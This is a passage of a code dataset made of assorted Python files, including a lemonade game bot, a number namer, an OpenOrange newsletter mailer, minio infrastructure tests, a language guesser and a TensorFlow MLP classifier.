'multiple players in one game'\n\t\t'Expenses': r.json()['Results'][0]['Expenses'],\t\t\t\t# that would have different results\n\t\t'Profits': r.json()['Results'][0]['Profits']\t\t\t\t# since one player, we always need results[0]\n\t}\n\ndef printResultsOverview():\n\t# Don't display message and event if they're boring\n\tif printResultsMessage() == \"A normal, uneventful day.\":\n\t\tmsg1 = \"\"\n\telse:\n\t\tmsg1 = printResultsMessage() + \"\\n\"\n\n\tif printResultsEvent() == \"A normal, uneventful day.\":\n\t\tmsg2 = \"\"\n\telse:\n\t\tmsg2 = printResultsEvent() + \"\\n\"\n\n\treturn msg1 + msg2 + printResultsSold() + \"\\n\" + printResultsMoney()\n\n# ResultsMessage is only used if the street workers buy all your lemonade\n#\tor a storm wipes away everything for the day.\ndef printResultsMessage():\n\tif results['ResultMessage'] == \"\":\n\t\treturn \"A normal, uneventful day.\"\n\treturn results['ResultMessage']\n\n# A simple name for the day's event, like Storm or Street Work or Normal Day.\ndef printResultsEvent():\n\tif results['EventName'] == \"Normal day\":\n\t\treturn \"A normal, uneventful day.\"\n\treturn f\"The {results['EventName']} was happening all day.\"\n\ndef printResultsSold():\n\treturn f\"You sold {results['GlassesSold']} glasses of lemonade.\"\n\ndef printResultsMoney():\n\treturn f\"We spent {results['Expenses']}¢ today and brought in {results['Revenue']}¢ for a total profit of {results['Profits']}¢.\"\n\n\ndef printGreeting():\n\treturn \"Hello there, I'm the lemonade game bot. Tell me to start a game to begin playing!\"\n\ndef printRules():\n\treturn (\"You are going to start up a lemonade stand with some help from your friends.\\n\"\n\t\t\t\t\"You'll begin with $2.00 and will determine how many glasses of lemonade to make\"\n\t\t\t\t\" per day, how much to charge per glass, and how many advertising signs to make.\\n\"\n\t\t\t\t\"Signs cost 15¢ to make, but attract more customers. \"\n\t\t\t\t\"You have some sugar given to you to start, so lemonade will be cheaper to make the\"\n\t\t\t\t\" first few days.\\n\"\n\t\t\t\t\"to play, just talk with me like you would your friend. Ask me 'how's the weather', for example.\"\n\t\t\t\t\"Happy selling!\")\n\t\ndef createGame(name = \"Python\"):\n\tglobal assets, lemonadeCost, signCost, baseurl, headers\n\n\t# Create the game\n\turl=baseurl + \"CreateGame\"\n\n\t#Setup player name\n\tdata = {}\n\tdata['PlayerNames'] = [name]\n\tdata = json.dumps(data)\n\n\tprintData(data, True)\n\n\t#send request to the game server\n\tr = requests.post(url, headers=headers, data=data)\n\tprintData(r.json())\n\n\tgameId = r.json()['Id']\n\n\tstartNextDay(gameId)\n\tlemonadeCost = dayInfo['LemonadeCost']\n\n\treturn gameId\n\n\ndef doFinishDay(glasses, price, signs, gameId):\n\tglobal results, assets, lemonadeCost\n\tchoices = [{\"Glasses\": glasses, \"Price\": price, \"Signs\": signs}]\n\n\t# Validate what was just input\n\tmsg = validateChoices(choices)\n\tif msg is not \"G\":\n\t\treturn msg\n\n\t# actually do the result check\n\tfinishDay(choices, gameId)\n\tassets += results[\"Profits\"]\n\n\t# bankruptcy check\n\tif assets < lemonadeCost:\n\t\treturn \"You're bankrupt!\"\n\n\tstartNextDay(gameId)\n\tlemonadeCost = dayInfo['LemonadeCost']\n\n\treturn \"\"\n\n\nactions = {\n\t\"Assets\": printAssets,\n\t\"DayOverview\": printDayOverview,\n\t\"DayNumber\":printDayNumber,\n\t\"Weather\": printWeather,\n\t\"Event\":printEvent,\n\t\"CostPerGlass\":printCostToMake,\n\t\"CostPerSign\":printCostSign,\n\t\"DayNumber\":printDayNumber,\n\t\"ResultsMessage\":printResultsMessage,\n\t\"ResultsOverview\":printResultsOverview,\n\t\"ResultsEvent\":printResultsEvent,\n\t\"ResultsSold\":printResultsSold,\n\t\"ResultsMoney\": printResultsMoney,\n\t\"Greeting\":printGreeting,\n\t\"Rules\":printRules\n}\n\ndef doGetAction(action):\n\treturn actions[action]()\n\n","sub_path":"pythonConnector/playLemonade.py","file_name":"playLemonade.py","file_ext":"py","file_size_in_byte":6832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"265948036","text":"# Name: Number Namer\n# Author: Devin Vander Stelt\n# Description: Name any large number negative or positive\n# Usage: name(-105)\n\n# Dictionary for the ones place\nones = {\n 0: \"\",\n 1: \"one\",\n 2: \"two\",\n 3: \"three\",\n 4: \"four\",\n 5: \"five\",\n 6: \"six\",\n 7: \"seven\",\n 8: \"eight\", \n 9: \"nine\"\n}\n\n# Dictionary for the teens, because english\nteens = {\n 0: \"ten\",\n 1: \"eleven\",\n 2: \"twelve\",\n 3: \"thirteen\",\n 4: \"fourteen\",\n 5: \"fifteen\",\n 6: \"sixteen\",\n 7: \"seventeen\",\n 8: \"eighteen\",\n 9: \"nineteen\"\n}\n\n# Dictionary for multiples of ten\ntens = {\n 0: \"\", # There is no tens place\n 1: \"\", # This is handled by teens place\n 2: \"twenty\",\n 3: \"thirty\",\n 4: \"forty\", \n 5: \"fifty\",\n 6: \"sixty\",\n 7: \"seventy\",\n 8: \"eighty\",\n 9: \"ninety\"\n}\n\n# Array for suffixes, such as thousand, million, etc\nsuffixes = [\n \"\",# For the first three digits there is no suffix\n \" thousand \",\n \" million \",\n \" billion \",\n \" trillion \",\n \" quadrillion \",\n \" quintillion \",\n \" sextillion \",\n \" septillion \",\n \" octillion \",\n \" nonillion \",\n \" decillion \",\n \" undecillion \",\n \" duodecillion \",\n \" tredecillion \",\n \" quatturodecillion \",\n \" quindecillion \",\n \" sexdecillion \",\n \" septdecillion \",\n \" octodecillion \",\n \" nondecillion \",\n \" vigintillion \",\n \" unvigintillion \",\n \" duovigintillion \",\n \" trevigintillion \",\n \" quattuorvigintillion \",\n \" quinvigintillion \",\n \" sexvigintillion \",\n \" septenvigintillion \"\n # After this, do you even care any more?\n]\n\n\ndef name_three(nums): # nums is a list of three numbers\n hundreds = \"\"\n tens_ones = \"\"\n\n if nums[0] != 0: # If the hundreds place is not 0\n hundreds = ones[nums[0]] + \" hundred \"\n \n if nums[1] != 1: # If our number is not in the teens\n tens_ones = tens[nums[1]] + (\" \" + ones[nums[2]] if nums[2] != 0 else \"\") # Ternary operator, look it up\n else:\n tens_ones = teens[nums[2]]\n\n return hundreds + tens_ones\n\n\ndef name(num):\n digits = []\n negative = False\n\n if num < 0: # If num is negative\n negative = True # Set negative variable to true\n num = abs(num) # Make num positive\n\n # Convert the number to an array of digits\n for _ in range(len(str(num))): # For every digit in num\n digit = num % 10 # Get the place of the first digit\n digits.insert(0, digit) # Add to the digits array\n num = num // 10 # Remove the digit from num\n\n output = \"\"\n\n # Append extra zeros to the beginning to make a group of three\n zeros_needed = 3- (len(digits) % 3)\n for _ in range(zeros_needed):\n digits.insert(0, 0)\n\n for i in range(len(digits) // 3): # For every complete group of three\n end = len(digits) - 3*i # Get the end of the group\n start = end - 3 # Get the start of the group\n three_group = digits[start: end] # Create list with the group of three\n group_name = name_three(three_group) # Get the name of the group of three\n output = (\n group_name\n + (suffixes[i] if group_name.replace(\" \", \"\") != \"\" else \"\") # Add appropriate suffix if name isn't blank, using i as index\n + output # Add previous output to end, since we are moving right to left\n )\n\n if negative:\n output = \"negative \" + output\n\n if output.replace(\" \", \"\") == \"\": # If our output string is just a bunch of spaces\n output = \"zero\" # Our number is zero\n\n return output\n\n\nprint(name(-113))","sub_path":"Number_Name/name.py","file_name":"name.py","file_ext":"py","file_size_in_byte":3656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"297406693","text":"import numpy as np\nimport random\nimport math\n\nclass Marker:\n def __init__(self, startLocation, direction):\n self.currLocation = np.array(startLocation)\n self.prevLocation = np.array(startLocation)\n self.direction = np.array(direction)\n self.moveSpeed = .095\n self.finished = False\n self.normal = np.array([0.,1.,0.])\n \n def propagate(self, lowToughnessAreas, initCrack):\n rng = 0 if initCrack else random.uniform(.15, 1.)\n \n rng *= self.calcMovementWeight(lowToughnessAreas)\n \n self.prevLocation = np.copy(self.currLocation)\n \n # Ensure energy conservation\n forwardSpeed = self.moveSpeed * self.direction * (1. - abs(rng))\n normalSpeed = rng * self.moveSpeed * self.normal\n \n self.currLocation += forwardSpeed + normalSpeed\n \n def calcMovementWeight(self, lowToughnessAreas):\n deltaY = 1000.\n lowestToughnessArea = 0.\n maxWeight = .67\n maxThreshold = 3.1\n \n for y in lowToughnessAreas:\n if abs(self.currLocation[1] - y) < deltaY:\n lowestToughnessArea = y\n deltaY = abs(self.currLocation[1] - y)\n \n # Ideally we should set the max threshold to be the point of highest toughness between the marker and either\n # the edge of the surface mesh, or the next low toughness area\n maxThreshold = lowestToughnessArea\n \n constant = maxThreshold / (maxThreshold + .35)\n \n # Determined this equation through trial and error\n scalarVal = pow(math.exp(.357 * pow(((constant * deltaY) - maxThreshold), 3.)), math.pi / 10.) + .004\n \n # Clamp value\n scalarVal = min(scalarVal, 1.)\n scalarVal = max(scalarVal, 0.)\n \n weight = maxWeight * scalarVal\n \n if lowestToughnessArea < self.currLocation[1]:\n weight = -weight\n \n return weight\n ","sub_path":"marker.py","file_name":"marker.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"652377610","text":"#------------------------------------------------------------------\n#Import the packages\n#------------------------------------------------------------------\n\nfrom __future__ import division\nimport matplotlib.pyplot as plt\nfrom pylab import *\nimport numpy as np\nfrom datetime import datetime\n\n#------------------------------------------------------------------\n# Compute the statistics\n#------------------------------------------------------------------\n\nstart = 1439892000 #08/18 6:00\nend = 1439935200 #08/18 18:00\nendpoints = np.linspace(start, end, 13)\n\nclass chunk_file:\n \n def __init__(self, name):\n self.name = name \n self.file = []\n self.chunk_file = []\n self.read_file()\n self.chunkit()\n \n def read_file(self): \n f = open('_'.join(self.name.split(' '))+'.txt','rb')\n sent = f.read().split('\\n')\n f.close()\n self.file = [w.strip().split(' ') for w in sent]\n return\n \n def chunkit(self):\n for i in range(12):\n t = endpoints[i]\n t2 = t + 3600\n res = [(w[1]=='pos',w[1]=='neg') \n for w in self.file \n if t < float(w[0].strip()) <= t2]\n pos, neg = sum([w[0] for w in res]), sum([w[1] for w in res])\n self.chunk_file.append([pos,\n neg,\n datetime.fromtimestamp(int(t2)).strftime('%m-%d %H:%M')])\n return\n \n def summary(self):\n positive = [w[0] for w in self.chunk_file]\n total = [(w[0]+w[1]) for w in self.chunk_file]\n t = [w[2] for w in self.chunk_file]\n cum_prob = []\n for i in range(1,13):\n cum_prob.append(sum(positive[:i])/sum(total[:i]))\n return cum_prob, t, positive, total\n \n \ncum1, t, pos1,total1 = chunk_file('Hillary Clinton').summary()\ncum2, t, pos2, total2 = chunk_file('Donald Trump').summary()\n \n#------------------------------------------------------------------\n# Plot the cumulative sentiment ratio\n#------------------------------------------------------------------\n\nfig = plt.figure()\nax = fig.add_subplot(111)\n\np = arange(12)+.5 \n\np1 = ax.plot(p,cum1)\nsetp(p1, \n marker ='s', \n markersize = 10,\n markeredgecolor = 'none', \n linewidth = 5, \n color = '#0B0B61',\n label = 'Clinton') \nfor i,j in zip(p,cum1):\n ax.annotate(round(j,2),xy=(i-0.3,j+0.007),fontweight = 'bold')\n\np2 = plot(p,cum2)\nsetp(p2, \n marker = 'o',\n markersize = 12,\n markeredgecolor = 'none',\n linewidth = 5, \n color = 'r',\n label = 'Trump')\nfor i,j in zip(p,cum2):\n ax.annotate(round(j,2),xy=(i-0.3,j+0.007),fontweight = 'bold')\n\nxticks(p, ['\\n'.join(i.split(' ')) for i in t],fontsize=11)\nlegend(bbox_to_anchor=(1.05, 0.5), loc=2, borderaxespad=0.5,frameon=False,labelspacing =2)\nax.set_xlabel('Time',fontsize=14)\nax.set_ylabel('Positive Rate', fontsize=14)\ntitle('Cumulative Sentiment Scores\\n',fontsize=20)\ngrid(True,linestyle='-', linewidth=1) \n\nshow()\n\n","sub_path":"nlp_tutorial2_plot.py","file_name":"nlp_tutorial2_plot.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"363958274","text":"#encoding: utf-8\nfrom OpenOrange import *\nfrom Mail import Mail\nimport string\nimport re\n\nNewsletterSelectionType = {\"Customers\":0, \"Labels\":1, \"CustGroup\":2, \"Contacts\":3}\n\nParentNewsletter = SuperClass(\"Newsletter\",\"Numerable\",__file__)\n# No deberia derivar de Mailing??\nclass Newsletter(ParentNewsletter):\n \n def defaults(self):\n ParentNewsletter.defaults(self)\n #self.PacketSize = 10\n self.User = currentUser()\n self.pasteUser()\n \n def pasteUser(self):\n from User import User\n user = User()\n user.Code = self.User\n self.FromMail = \"\"\n if user.load():\n from Person import Person\n person = Person()\n person.Code = user.Person\n if person.load(): self.MailFrom = person.Email\n\n def pasteMailCode(self):\n from MailAccount import MailAccount\n acc = MailAccount()\n acc.Code = self.MailCode\n if (acc.load()):\n self.MailFrom = acc.Mail\n\n def getIMGTags(self, html):\n tags = []\n regexp = re.compile(\"(]*>)\")\n pos = 0\n while True:\n search = regexp.search(html,pos)\n if search:\n pos = search.end(1) + 1\n for g in search.groups():\n tags.append(g)\n else:\n break\n return tags\n\n def getFilenameFromIMG(self, tag):\n fn = \"\"\n regexp = re.compile(\"src=([^\\\" >]+)\")\n search = regexp.search(tag)\n if search: \n fn = search.group(1)\n else:\n regexp = re.compile(\"src=\\\"([^\\\">]+)\\\"\")\n search = regexp.search(tag)\n if len(search.groups()): \n fn = search.group(1)\n originalfn = fn\n if fn.startswith(\"file:///\"): fn = fn[8:]\n fn = fn.replace('|', ':').replace(\"%20\",' ')\n return fn, originalfn\n\n def importHTML(self, html):\n tags = self.getIMGTags(html)\n newhtml = html\n for tag in tags:\n imgfn, originalimgfn = self.getFilenameFromIMG(tag)\n \n if imgfn != \"\":\n try:\n img = file(imgfn, \"rb\")\n attachid = self.createMimeImageAttach(img.read())\n img.close()\n newtag = tag.replace(originalimgfn, attachid)\n newhtml = newhtml.replace(tag, newtag)\n except:\n self.appendMessage(tr(\"File could not be opened:\") + \"%s\" %(imgfn))\n \n self.MessageBody = newhtml\n self.save()\n\n def doNewsletter(self): \n selType = NewsletterSelectionType\n self.mytext = self.MessageBody\n #self.replaceClauses()\n \n cuentas = Query()\n cuentas.sql = \"SELECT * FROM [MailAccount] WHERE {Mail}=s|%s| AND {User}=s|%s| \" % (self.MailFrom, currentUser())\n cuentas.setLimit(1)\n if (cuentas.open()):\n for cuenta in cuentas: \n server = cuenta.SMTPServer\n port = cuenta.SMTPPort\n sslflag = cuenta.SMTPReqSSL\n if (not cuenta.SMTPAnonymous):\n user = cuenta.SMTPUser\n passwd = cuenta.SMTPPassword \n\n dests = Query()\n dests.sql = \"SELECT {Email} FROM [Person]\" \n if(self.Labels):\n labels = self.Labels.split(\",\")\n for lb in labels: \n dests.sql+=\"\"\" WHERE?AND ({Labels} like s|%s| or {Labels} like s|%s|\n or {Labels} like s|%s| or {Labels} like s|%s|)\"\"\" % (lb , lb+\",%\" , \"%,\"+lb , \"%,\"+lb+\",%\")\n \n cantMails = 0\n yaEnviados = 0\n total = 0\n if (dests.open()):\n total = dests.count()\n for mail in dests:\n chequeo = Query() \n chequeo.sql = \"SELECT {Id} FROM [Mail] WHERE {MailTo}=s|%s| AND {SentFlag}=i|1| AND {Newsletter}=i|%i|\" % (mail.Email, self.SerNr)\n if (chequeo.open()): \n if (chequeo.count() == 0): # Si no fue enviado ya...\n from HTMLRecordView import HTMLRecordView\n msg = HTMLRecordView.replaceNames(mail, self.mytext)\n msg = HTMLRecordView.replaceClauses(msg)\n if (self.GenerateMail(msg, mail.Email, server, port, user, passwd, sslflag)):\n cantMails += 1\n else:\n yaEnviados += 1\n\n self.appendMessage(\"%i de %i mails enviados (%i ya habian sido enviados)\" % (cantMails, total, yaEnviados))\n \n \n def GenerateMail(self, body, mailto, server, port, user=\"\", passwd=\"\", sslflag=None):\n res = False \n myMail = Mail()\n myMail.MailTo = mailto\n myMail.MailFrom = self.MailFrom\n myMail.Subject = self.Subject\n myMail.TransDate = today()\n myMail.TransTime = now()\n myMail.MessType = 0\n myMail.Status = 0\n myMail.SentFlag = False\n myMail.Mailing = self.SerNr\n myMail.Id = self.MessageId \n #myMail.save()\n \n attachids = self.mimeImageAttachIds()\n for tag in self.getIMGTags(body):\n attid = self.getFilenameFromIMG(tag)\n if attid in attachids:\n image = self.getAttachAsString(attid)\n newattid = myMail.createMimeImageAttach(image)\n newtag = tag.replace(attid, newattid)\n body = body.replace(tag, newtag)\n\n myMail.MessageBody = body\n myMail.ParentId = \"-1\" \n myMail.save() \n res = myMail.send(server, port, user, passwd, sslflag) \n if not res:\n self.appendMessage(res)\n self.save() \n commit()\n \n return res\n","sub_path":"standard/records/Newsletter.py","file_name":"Newsletter.py","file_ext":"py","file_size_in_byte":5946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"528036521","text":"import os\nimport yaml\nimport pytest\nimport testinfra.utils.ansible_runner\n\n\ntestinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(\n os.environ['MOLECULE_INVENTORY_FILE']).get_hosts('all')\ndir_path = os.path.dirname(os.path.abspath(__file__))\n\n\n@pytest.fixture()\ndef AnsibleDefaults():\n with open(os.path.join(dir_path, './../../../defaults/main.yml'), 'r') as stream:\n return yaml.load(stream)\n\n@pytest.fixture()\ndef AnsiblePlaybook():\n with open(os.path.join(dir_path, './../playbook.yml'), 'r') as stream:\n return yaml.load(stream)\n\n\n@pytest.mark.parametrize('minio_bin_var', [\n 'minio_server_bin',\n 'minio_client_bin',\n])\ndef test_minio_installed(host, AnsibleDefaults, minio_bin_var):\n\n f = host.file(AnsibleDefaults[minio_bin_var])\n assert f.exists\n assert f.user == 'root'\n assert f.group == 'root'\n assert oct(f.mode) == '0o755'\n\n\ndef test_minio_server_data_directory(host, AnsibleDefaults, AnsiblePlaybook):\n\n playbpook = AnsiblePlaybook[0]\n for role in playbpook['roles']:\n layoutName = role['vars']['minio_layout']\n datadir = \"/var/lib/minio-{}\".format(layoutName)\n d = host.file(datadir)\n assert d.is_directory\n assert d.exists\n assert d.user == AnsibleDefaults['minio_user']\n assert d.group == AnsibleDefaults['minio_group']\n assert oct(d.mode) == '0o750'\n\n\ndef test_minio_server_webservers(host, AnsibleDefaults):\n\n for layoutName in AnsibleDefaults['minio_layouts'].keys():\n server_addr = AnsibleDefaults['minio_layouts'][layoutName]['server_addr']\n addr = \"tcp://127.0.0.1{}\".format(server_addr)\n host.socket(addr).is_listening\n","sub_path":"molecule/layouts/tests/test_minio_default.py","file_name":"test_minio_default.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"642295826","text":"import random\noffices = [[], [], []]\nteacher = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\"]\n\n#从教师列表中提取教师名字\nfor name in teacher:\n index = random.randint(0, 2)\n offices[index].append(name)\n\n#查看每间教室有几个老师\ni = 1\nfor office in offices:\n print(\"办公室%d的人数为:%d\"%(i, len(office)))\n i += 1\n for name in office:\n print(\"%s\"%name, end=\"\\t\")\n print(\"\\n\")\n print(\"-\"*20)","sub_path":"给空列表随机分配人.py","file_name":"给空列表随机分配人.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"368571712","text":"\"\"\"\nGiven an array of strings, group anagrams together.\n\nFor example, given: [\"eat\", \"tea\", \"tan\", \"ate\", \"nat\", \"bat\"],\nReturn:\n\n[\n [\"ate\", \"eat\",\"tea\"],\n [\"nat\",\"tan\"],\n [\"bat\"]\n]\n\nNote:\n\n For the return value, each inner list's elements must follow the lexicographic order.\n All inputs will be in lower-case.\n\"\"\"\ndef groupAnagrams(strs):\n \"\"\"\n :type strs: List[str]\n :rtype: List[List[str]]\n \"\"\"\n anagrams = {}\n for string in strs:\n key = anagram_key(string)\n anagram_list = anagrams.setdefault(key, [])\n anagram_list.append(string)\n return [sorted(l) for l in anagrams.values()]\n\n\ndef anagram_key(string):\n letters = [0 for _ in xrange(26)]\n for char in string:\n index = ord(char) - ord('a')\n letters[index] += 1\n return \"\".join([str(x) for x in letters])","sub_path":"leetcode/anagrams.py","file_name":"anagrams.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"10881316","text":"from collections import defaultdict\nbase_info = defaultdict(lambda:0)\nswitch = 0\n\nwith open('UKdata.txt', 'r') as input_data:\n for line in input_data:\n for i in range(len(line) - 3):\n if(line[i:i+4] == '基礎情報'):\n switch = 1\n if switch == 1:\n for j in range(len(line)):\n if(line[j] == '='):\n base_info[line[1:j]] = line[j+2:]\n break\n elif(line[j] == '*'):\n break\n elif(line[j] == '}'):\n switch = 0\n print(base_info)\n","sub_path":"naruhisa/chapter03/knock25.py","file_name":"knock25.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"635056052","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('login/', views.login_usuario, name='login'),\n path('logout/', views.logout_usuario, name='logout'),\n path('registrar/', views.registrar_usuario, name='registrar'),\n path('editar_perfil/', views.editar_perfil, name='editar_perfil'),\n path('mudar_senha/', views.mudar_senha, name='mudar_senha')\n]","sub_path":"autenticacao/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"67721394","text":"def languageClassification(sentence):\n import re\n eng = [ 'the','a','and','of','be','that','have','it','for','not']\n fr = [ 'le','la','de','ne','et','un','pas','vous','etre','les','en','je']\n span = [ 'los','las','un','allí','tener','pero','para','por','si','el','y','se','en']\n ecount = 0\n fcount = 0\n scount = 0\n \n for word in eng:\n if re.search(word, sentence):\n ecount+=1\n for word in fr:\n if re.search(word, sentence):\n fcount+=1\n for word in span:\n if re.search(word, sentence):\n scount+=1\n print(\"eng: \",ecount,\" fr: \",fcount,\" span: \",scount)\n if(ecount>fcount and ecount>scount):\n print(\"Language is English\")\n elif(fcount>ecount and fcount>scount):\n print(\"Language is French\")\n elif(scount>ecount and scount>fcount):\n print(\"Language is Spanish\")\n else:\n print(\"Language could not be determined\")\n \n","sub_path":"NPL/Lab 4/languageClassifiction.py","file_name":"languageClassifiction.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"349802902","text":"\"\"\" Multilayer Perceptron.\nA Multilayer Perceptron (Neural Network) implementation example using\nTensorFlow library. This example is using the MNIST database of handwritten\ndigits (http://yann.lecun.com/exdb/mnist/).\nLinks:\n [MNIST Dataset](http://yann.lecun.com/exdb/mnist/).\nAuthor: Aymeric Damien\nProject: https://github.com/aymericdamien/TensorFlow-Examples/\n\"\"\"\nfrom __future__ import print_function\n\n# Import MNIST data\nfrom project_utils import load_features, load_test_features\nimport tensorflow as tf\nimport numpy as np\n\npreprocesses = [\"None\", \"gaussian\", \"sqeeze\"]\nattacks = [\"None\", \"spatial_grid\", \"fgsm\", \"gsma\", \"spatial_grid\"]\n \nx_train, y_train = load_features()\n\n# Parameters\nlearning_rate = 0.001\ntraining_epochs = 15\nbatch_size = 128\ndisplay_step = 1\n\n# Network Parameters\nn_hidden_1 = 256 # 1st layer number of neurons\nn_hidden_2 = 256 # 2nd layer number of neurons\nn_input = x_train.shape[1] # MNIST data input \nn_classes = y_train.shape[1] # MNIST total classes (6,7 digits)\n\n# tf Graph input\nX = tf.placeholder(\"float\", [None, n_input])\nY = tf.placeholder(\"float\", [None, n_classes])\n\n# Store layers weight & bias\nweights = {\n 'h1': tf.Variable(tf.random_normal([n_input, n_hidden_1])),\n 'h2': tf.Variable(tf.random_normal([n_hidden_1, n_hidden_2])),\n 'out': tf.Variable(tf.random_normal([n_hidden_2, n_classes]))\n}\nbiases = {\n 'b1': tf.Variable(tf.random_normal([n_hidden_1])),\n 'b2': tf.Variable(tf.random_normal([n_hidden_2])),\n 'out': tf.Variable(tf.random_normal([n_classes]))\n}\n\n\n# Create model\ndef multilayer_perceptron(x):\n # Hidden fully connected layer with 256 neurons\n layer_1 = tf.add(tf.matmul(x, weights['h1']), biases['b1'])\n # Hidden fully connected layer with 256 neurons\n layer_2 = tf.add(tf.matmul(layer_1, weights['h2']), biases['b2'])\n # Output fully connected layer with a neuron for each class\n out_layer = tf.matmul(layer_2, weights['out']) + biases['out']\n return out_layer\n\n# Construct model\nlogits = multilayer_perceptron(X)\n\n# Define loss and optimizer\nloss_op = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(\n logits=logits, labels=Y))\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\ntrain_op = optimizer.minimize(loss_op)\n# Initializing the variables\ninit = tf.global_variables_initializer()\n\n\ndef train():\n # Add ops to save and restore all the variables.\n saver = tf.train.Saver()\n with tf.Session() as sess:\n sess.run(init)\n\n # Training cycle\n for epoch in range(training_epochs):\n avg_cost = 0.\n total_batch = int(len(y_train)/batch_size)\n # Loop over all batches\n for i in range(total_batch):\n # batch_x, batch_y = mnist.train.next_batch(batch_size)\n batch_x = x_train[i*batch_size:min((i+1)*batch_size,len(y_train))]\n batch_y = y_train[i*batch_size:min((i+1)*batch_size,len(y_train))]\n # Run optimization op (backprop) and cost op (to get loss value)\n _, c = sess.run([train_op, loss_op], feed_dict={X: batch_x,\n Y: batch_y})\n # Compute average loss\n avg_cost += c / total_batch\n # Display logs per epoch step\n if epoch % display_step == 0:\n print(\"Epoch:\", '%04d' % (epoch+1), \"cost={:.9f}\".format(avg_cost))\n print(\"Optimization Finished!\")\n for preprocess in preprocesses:\n for attack in attacks:\n print(preprocess, attack)\n feature, y_label = load_test_features(preprocess, attack)\n # Test model\n pred = tf.nn.softmax(logits) # Apply softmax to logits\n # run\n prediction = pred.eval({X: feature, Y: y_label}) \n # calculate metric\n true_labels = np.argmax(y_label, axis=1)\n pred_labels = np.argmax(prediction[:len(y_label)], axis=1)\n # True Positive (TP): we predict a label of 1 (positive), and the true label is 1.\n TP = np.sum(np.logical_and(pred_labels == 1, true_labels == 1))\n \n # True Negative (TN): we predict a label of 0 (negative), and the true label is 0.\n TN = np.sum(np.logical_and(pred_labels == 0, true_labels == 0))\n \n # False Positive (FP): we predict a label of 1 (positive), but the true label is 0.\n FP = np.sum(np.logical_and(pred_labels == 1, true_labels == 0))\n \n # False Negative (FN): we predict a label of 0 (negative), but the true label is 1.\n FN = np.sum(np.logical_and(pred_labels == 0, true_labels == 1))\n\n recall = TP/float(TP+FN)\n precision = TP/float(TP+FP)\n f1 = 2.*TP/(2.*TP + FP + FN) \n\n correct_prediction = tf.equal(tf.argmax(pred, 1), tf.argmax(Y, 1))\n # Calculate accuracy\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\n print(\"Accuracy:\", accuracy.eval({X: x_train, Y: y_train}))\n print(preprocess, attack, \"accuracy\", accuracy)\n print(preprocess, attack, \"precision\", precision)\n print(preprocess, attack, \"recall\", recall)\n print(preprocess, attack, \"f1\", f1)\n\n # Save the variables to disk.\n # save_path = saver.save(sess, \"../models/mighty.ckpt\")\n\ndef evaluate():\n preprocesses = [\"None\", \"gaussian\", \"sqeeze\"]\n attacks = [\"None\", \"spatial_grid\", \"fgsm\", \"gsma\", \"spsa\"]\n # Add ops to save and restore all the variables.\n saver = tf.train.Saver(max_to_keep=5, keep_checkpoint_every_n_hours=1)\n\n # Later, launch the model, use the saver to restore variables from disk, and\n # do some work with the model.\n with tf.Session() as sess:\n # Restore variables from disk.\n saver.restore(sess, tf.train.latest_checkpoint('../models/'))\n for preprocess in preprocesses:\n for attack in attacks:\n print(preprocess, attack)\n feature, y_label = load_test_features(preprocess, attack)\n logits = sess.run('Softmax', \n feed_dict={X: feature, Y: y_label})\n print(logits)\n \n # Test model\n pred = tf.nn.softmax(logits) # Apply softmax to logits\n # run\n prediction = pred.eval({X: feature, Y: y_label}) \n # calculate metric\n true_labels = np.argmax(y_label, axis=1)\n pred_labels = np.argmax(prediction[:len(y_label)], axis=1)\n # True Positive (TP): we predict a label of 1 (positive), and the true label is 1.\n TP = np.sum(np.logical_and(pred_labels == 1, true_labels == 1))\n \n # True Negative (TN): we predict a label of 0 (negative), and the true label is 0.\n TN = np.sum(np.logical_and(pred_labels == 0, true_labels == 0))\n \n # False Positive (FP): we predict a label of 1 (positive), but the true label is 0.\n FP = np.sum(np.logical_and(pred_labels == 1, true_labels == 0))\n \n # False Negative (FN): we predict a label of 0 (negative), but the true label is 1.\n FN = np.sum(np.logical_and(pred_labels == 0, true_labels == 1))\n\n recall = TP/float(TP+FN)\n precision = TP/float(TP+FP)\n f1 = 2.*TP/(2.*TP + FP + FN) \n print(preprocess, attack, \"accuracy\", accuracy)\n print(preprocess, attack, \"precision\", precision)\n print(preprocess, attack, \"recall\", recall)\n print(preprocess, attack, \"f1\", f1)\n\n correct_prediction = tf.equal(tf.argmax(pred, 1), tf.argmax(Y, 1))\n # Calculate accuracy\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\n print(\"Accuracy:\", accuracy.eval({X: feature, Y: y_label}))\ntrain()\n#evaluate()","sub_path":"cleverhans_tutorials/MLP.py","file_name":"MLP.py","file_ext":"py","file_size_in_byte":8193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"388522360","text":"from 